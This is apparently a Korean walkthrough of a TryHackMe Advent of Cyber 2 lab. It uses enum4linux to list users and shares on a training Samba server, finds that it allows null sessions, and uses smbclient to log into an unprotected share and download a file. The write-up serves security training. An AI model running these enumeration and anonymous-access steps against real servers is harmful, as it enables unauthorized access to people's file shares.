[TryHackMe] Advent of Cyber 2, Day 10 - Walkthrough -
"Advent of Cyber 2"는 "free room"(무료)에서 제공됩니다. 구독 없이 가상 머신을 "배포(Deploy)"할 수 있습니다.
「Advent of Cyber 2」의 Walkthrough 인덱스를 「 [TryHackMe] Advent of Cyber 2에 참여해 보았습니다. 」에서 공개했습니다.
[Day 10] Networking: Don't be sElfish!
스토리
The Best Festival Company(TBFC)는 작년 공격 이후 IT 인프라를 확장하여 VPN 서버 및 기타 서비스를 포함하여 다른 모든 요정이 사용할 수 있도록 했습니다. 당신은 안도의 한숨을 내쉰다…
그러나 갑자기 차가운 떨림이 척추를 뛰어 넘어 독백을 방해합니다 ...
갑자기 공격이 발생하기 직전에 엘프 McSkidy가 Samba
파일 서버를 설정했음을 기억합니다. - 이것도 해킹 되었습니까? 이것도 해킹되었을 가능성이 있습니까? 우리의 데이터는 어떻습니까 ... 아니, 일찍! 누출되었을 가능성이 있는 사용자명을 조사해, 스스로 서버에 로그인을 시도해, 발견된 취약성을 메모해 엘프 McSkidy에 보고해 보자.
Day 10 - #1.
Question #1 Using enum4linux, how many users are there on the Samba server (MACHINE_IP)?
IP 주소 MACHINE_IP
를 tbfc.smb
로 /etc/hosts
에 추가합니다.
그런 다음 enum4linux
명령을 사용합니다. 명령 구문은 다음과 같습니다.
kali@kali:~$ enum4linux -U tbfc.smb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Dec 10 11:54:52 2020
==========================
| Target Information |
==========================
Target ........... tbfc.smb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
================================================
| Enumerating Workgroup/Domain on tbfc.smb |
================================================
[+] Got domain/workgroup name: TBFC-SMB-01
=================================
| Session Check on tbfc.smb |
=================================
[+] Server tbfc.smb allows sessions using username '', password ''
=======================================
| Getting domain SID for tbfc.smb |
=======================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=========================
| Users on tbfc.smb |
=========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Thu Dec 10 11:55:08 2020
해답은 「 grep Account
」의 결과가 힌트입니다.
kali@kali:~$ enum4linux -U tbfc.smb | grep Account
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
Day 10 - #2.
Question #2 Now how many "shares"are there on the Samba server?
enum4linux
명령을 사용합니다. 명령 구문은 다음과 같습니다.
kali@kali:~$ enum4linux -S tbfc.smb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Dec 10 11:57:56 2020
.
省略
.
=====================================
| Share Enumeration on tbfc.smb |
=====================================
Sharename Type Comment
--------- ---- -------
tbfc-hr Disk tbfc-hr
tbfc-it Disk tbfc-it
tbfc-santa Disk tbfc-santa
IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on tbfc.smb
//tbfc.smb/tbfc-hr Mapping: DENIED, Listing: N/A
//tbfc.smb/tbfc-it Mapping: DENIED, Listing: N/A
//tbfc.smb/tbfc-santa Mapping: OK, Listing: OK
//tbfc.smb/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Thu Dec 10 11:58:17 2020
Day 10 - #3.
Question #3 Use smbclient to try to login to the shares on the Samba server (MACHINE_IP). What share doesn't require a password?
Day 10 - #2.
에서 Mapping: OK, Listing: OK
라고 진단된 공유 디렉토리가 있습니다.
kali@kali:~$ smbclient //tbfc.smb/tbfc-hr
Enter WORKGROUP\kali's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali:~$ smbclient //tbfc.smb/tbfc-it
Enter WORKGROUP\kali's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali:~$ smbclient //tbfc.smb/tbfc-santa
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \>
Day 10 - #4.
Question #4 Log in to this share, what directory did ElfMcSkidy leave for Santa?
smbclient
명령을 사용하여 tbfc.smb
서버의 공유 리소스에 액세스합니다. 명령 구문은 다음과 같습니다.
kali@kali:~$ smbclient //tbfc.smb/tbfc-santa
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Nov 11 21:12:07 2020
.. D 0 Wed Nov 11 20:32:21 2020
jingle-tunes D 0 Wed Nov 11 21:10:41 2020
note_from_mcskidy.txt N 143 Wed Nov 11 21:12:07 2020
10252564 blocks of size 1024. 5200028 blocks available
note_from_mcskidy.txt
파일 내용이 궁금합니다. 로컬로 다운로드합니다.
smb: \> get note_from_mcskidy.txt
getting file \note_from_mcskidy.txt of size 143 as note_from_mcskidy.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
note_from_mcskidy.txt
파일의 내용을 cat
명령으로 확인해 봅시다.
kali@kali:~$ cat note_from_mcskidy.txt
Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
안녕하세요, 산타 씨. 좋아하는 징글을이 공유에 넣어 보았습니다. -- 당신이 좋아하는 장소에서 거기에 액세스할 수 있도록! 감사합니다 ~ 엘프 McSkidy
jingle-tunes
디렉토리의 내용을 확인해 둡시다.
smb: \> cd jingle-tunes
smb: \jingle-tunes\> dir
. D 0 Wed Nov 11 21:10:41 2020
.. D 0 Wed Nov 11 21:12:07 2020
10252564 blocks of size 1024. 5200028 blocks available
smb: \jingle-tunes\>
보충: nmapAutomator.sh 스크립트
nmapAutomator.sh
스크립트를 사용하면 필요한 정보를 쉽게 수집할 수 있습니다.
10일째의 미션이 종료입니다.
유용한 TryHackMe 객실
kali@kali:~$ enum4linux -U tbfc.smb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Dec 10 11:54:52 2020
==========================
| Target Information |
==========================
Target ........... tbfc.smb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
================================================
| Enumerating Workgroup/Domain on tbfc.smb |
================================================
[+] Got domain/workgroup name: TBFC-SMB-01
=================================
| Session Check on tbfc.smb |
=================================
[+] Server tbfc.smb allows sessions using username '', password ''
=======================================
| Getting domain SID for tbfc.smb |
=======================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=========================
| Users on tbfc.smb |
=========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Thu Dec 10 11:55:08 2020
kali@kali:~$ enum4linux -U tbfc.smb | grep Account
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceager Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
kali@kali:~$ enum4linux -S tbfc.smb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Dec 10 11:57:56 2020
.
省略
.
=====================================
| Share Enumeration on tbfc.smb |
=====================================
Sharename Type Comment
--------- ---- -------
tbfc-hr Disk tbfc-hr
tbfc-it Disk tbfc-it
tbfc-santa Disk tbfc-santa
IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on tbfc.smb
//tbfc.smb/tbfc-hr Mapping: DENIED, Listing: N/A
//tbfc.smb/tbfc-it Mapping: DENIED, Listing: N/A
//tbfc.smb/tbfc-santa Mapping: OK, Listing: OK
//tbfc.smb/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Thu Dec 10 11:58:17 2020
kali@kali:~$ smbclient //tbfc.smb/tbfc-hr
Enter WORKGROUP\kali's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali:~$ smbclient //tbfc.smb/tbfc-it
Enter WORKGROUP\kali's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali:~$ smbclient //tbfc.smb/tbfc-santa
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \>
kali@kali:~$ smbclient //tbfc.smb/tbfc-santa
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Nov 11 21:12:07 2020
.. D 0 Wed Nov 11 20:32:21 2020
jingle-tunes D 0 Wed Nov 11 21:10:41 2020
note_from_mcskidy.txt N 143 Wed Nov 11 21:12:07 2020
10252564 blocks of size 1024. 5200028 blocks available
smb: \> get note_from_mcskidy.txt
getting file \note_from_mcskidy.txt of size 143 as note_from_mcskidy.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
kali@kali:~$ cat note_from_mcskidy.txt
Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
smb: \> cd jingle-tunes
smb: \jingle-tunes\> dir
. D 0 Wed Nov 11 21:10:41 2020
.. D 0 Wed Nov 11 21:12:07 2020
10252564 blocks of size 1024. 5200028 blocks available
smb: \jingle-tunes\>
Walkthrough
Reference
이 문제에 관하여([TryHackMe] Advent of Cyber 2, Day 10 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/v_avenger/items/515d91a369922b3d15d6텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)